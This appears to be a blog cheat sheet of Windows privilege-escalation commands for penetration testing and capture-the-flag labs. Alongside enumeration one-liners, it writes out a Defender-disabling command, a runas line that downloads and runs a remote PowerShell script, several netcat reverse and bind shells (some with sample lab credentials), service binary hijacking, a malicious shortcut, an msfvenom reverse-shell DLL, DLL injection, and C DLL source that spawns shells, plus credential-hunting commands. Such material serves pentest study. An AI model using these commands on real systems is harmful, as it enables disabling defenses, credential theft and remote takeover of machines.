Windows Snippets

4 minute read

Small collection of Windows privilege escalation scripts, references, binaries and commands.

Scripts

HostRecon.ps1
Sherlock.ps1
JAWS
windows-privesc-check
Windos-Exploit-Suggester

References

LOLBAS
PowerTools
nishang
RamblingCookieMonster

General

Users


whoami /all
wmic computersystem get username
net users
net user <username>

Get-LocalUser
Get-LocalUser -Name <username>


Groups


net localgroup
net localgroup <groupname>

Get-LocalGroup
Get-LocalGroup -Name <groupname>


System


systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"Domain" 


Drives


fsutil fsinfo drives
wmic logicaldisk get name
Get-PSDrive


Files


dir | findstr "<keyword>"  //grep for keyword
Get-ChildItem C:\users\targetuser -Filter *.txt -Recurse | % { $_.FullName }  // recursive dir for specific file type
Get-ChildItem -Path C:\users\chase\ -Recurse -File | Select-String <keyword>  //recursive dir grep for keyword
ls -r c:\ -file | % {select-string -path $_ -pattern mypassword}

dir /a-r-d /s /b    //writable directories
dir /s *keyword*    //search for keyword
dir c:\*.* /S /Q|FIND /i "owner"  //search for files by owner
dir /s /R /a        //search ADS


Processes


tasklist /v
tasklist /svc

wmic process list full 

Get-Process -Id <> | Select-Object * 

Get-CimInstance Win32_Process -Filter "name = 'example.exe'"
$proc = Get-CimInstance Win32_Process -Filter "name = 'example.exe'"
Invoke-CimMethod -InputObject $proc -MethodName GetOwner

procdump.exe -accepteula -ma <pid>


Firewall config


netsh firewall show state
netsh firewall show config 
netsh advfirewall firewall show rule name=all

Get-NetFirewallRule | Where { $_.Enabled –eq 'True' –and $_.Direction –eq 'Inbound' }
Get-NetFirewallRule | Where { $_.Enabled –eq 'True' –and $_.Direction –eq 'Outbound' }


Registry


reg query HKLM /s | findstr /i <item>
reg query HKCU /s | findstr /i <item>
reg query HKLM /f <item> /t REG_SZ /s
reg query HKCU /f <item> /t REG_SZ /s
	
reg query HKLM\SYSTEM\CurrentControlSet\Services\


wmic


wmic nicconfig get ipaddress,macaddress	                 //get ip and mac			

wmic computersystem get username	                 //verify account				   

wmic netlogin get name, lastlogon		         //who used sys last, last logged on				    

wmic desktop get screensaversecure, screensavertimeout	 //screen saver pass protected? get timeout	

wmic logon get autheticationpackage			 //which logon methods supported		                 

wmic process get caption, executablepath, commandline	 //indetify system processes

wmic process where name="process_name" call terminate    //terminates specific process
				
wmic os get name, servicepackmajorversion 		 //determine sys os

wmic product get name, version		                //identify installed software

wmic product where name="name' call uninstall /noninteractive   //uninstalls/removes defined software packages

wmic share get /ALL		                        //identify shares accessible to user							                               

wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"	//start rdp

wmic nteventlog get path, filename,writable            //find all sys event logs and checks if writable


Disable Windows Defender


powershell.exe -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $true


Services


sc query             //list services and perms
sc qc <service-name> // check perms, dependencies, config, changes etc.
  
sc Qdescription <service-name>  //get description of service
  
sc sdShow <service-name>  //get Service Descriptor Definition Language string for service
  ConvertFrom-SddlString -Sddl "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWRPWPDTLORC;;;S-1-5-21-2115913093-551423064-1540603852-1003)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLORC;;;BU)(A;;CCLCSWRPWPLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"  
// ^ Will give us owner, group, DACL, SACL and RawDescriptor

sc config <service-name> binpath="C:\programdata\rootshell.exe"
  
sc stop <service-name>
sc start <service-name>    


Get-ServiceUnquoted -Verbose       //PowerUp.ps1
  Write-ServiceBinary -Name ' ' -Path <hijack-path>

Get-ModifiableServiceFile -Verbose //PowerUp.ps1
  Install-ServiceBinary -Name ' '

Get-ModifiableService -Verbose     //PowerUp.ps1
  Invoke-ServiceAbuse -Name ' '

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """


Credentials


cmdkey /list

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
...web.config

dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s 

reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Get-CachedGPPPassword 
Get-GPPPassword       
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
post/windows/gather/credentials/gpp


Runas / PowerShell


runas /user:administrator /savecred "cmd.exe /k whoami"
runas /profile /savecred /user:administrator "rootshell.exe"
runas /user:administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://<lhost>/shell.ps1')"

Option explicit
dim oShell
set oShell= Wscript.CreateObject("WScript.Shell")
oShell.Run "runas /user:admin ""c:\windows\system32\cmd.exe"""
WScript.Sleep 100
oShell.Sendkeys "password~"
Wscript.Quit	

powershell -exec bypass -c "$Username = 'domain\user'; $Password = ''; $pass = ConvertTo-SecureString -AsPlainText $Password -Force; $Cred = New-Object  System.Management.Automation.PSCredential -ArgumentList $Username,$pass; Invoke-Command -Credential $Cred -ComputerName localhost { whoami }" 

echo $username = ' '
echo $password = ' ' 
echo $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securepassword 
echo Start-Process 'C:\Users\username\nc.exe' -ArgumentList '-e cmd.exe <ip> <port>' -Credential $credential

// HTB examples
$Username = 'arkham\\batman' 
$Password = 'Zx^#QZX+T!123'; 
$pass = ConvertTo-SecureString -AsPlainText $Password -Force 
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass 
Invoke-Command -Credential $Cred -ComputerName localhost { C:\tomcat\apache-tomcat-8.5.37\bin\nc64.exe 10.10.x.x 443 -e cmd.exe }
powershell -exec bypass .\s.ps1

$user = 'HELPLINE\tolu'
$password = '!zaq1234567890pl!99'
$computer = 'HELPLINE'
$pass = ConvertTo-SecureString -String $password -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ($user,$pass)
$session = New-PSSession -ComputerName $computer -Credential $cred -Authentication CredSSP
Invoke-Command -Session $session -ScriptBlock {whoami}
helpline\tolu

$pass​ = ConvertTo-SecureString ​'password'​ -AsPlainText -Force 
$cred​ = new-object System.Management.Automation.PSCredential(​'user'​, $pass​) 
$session​ = New-PSSession -ComputerName <rhost> -Credential ​$cred -Authentication Negotiate Enter-PSSession ​$session 



$WScript = New-Object -COM WScript.shell
$SC = $WScript.CreateShortcut('not_a_reverse_shell.lnk')
$SC.TargetPath="C:\Windows\System32\cmd.exe"
$SC.Arguments="/c cmd C:\programdata\rootshell.exe"
$SC   //check everything's in order            
$SC.Save()
//We can also take an un-malicious link and turn it into one..
Right click a link -> properties:
Target: C:\Windows\System32\cmd.exe /c C:\programdata\rootshell.exe
Start in: C:\Windows\System32
Ok


Finally there’s a tool called LNKUp that we can also use:

python generate.py --host localhost --type ntlm --output payload.lnk --execute 'C:\programdata\rootshell.exe'


DLLs


Windows Data Types

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 -f dll > shell.dll
//Check for SYSTEM processes before hand
Invoke-DLLInjection -ProcessID <pid> -Dll C:\programdata\shell.dll
#include <windows.h>

BOOL WINAPI DllMain( HINSTANCE hInst,
                     DWORD  ul_reason_for_call,
                     LPVOID lpReserved
                   )
{
    WinExec("C:\\programdata\\shell.exe", 0);
    return TRUE;
}
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int bind()
{
	WinExec("c:\\programdata\\nc.exe -lvp 443 -e cmd.exe", 0);
	return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		bind();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}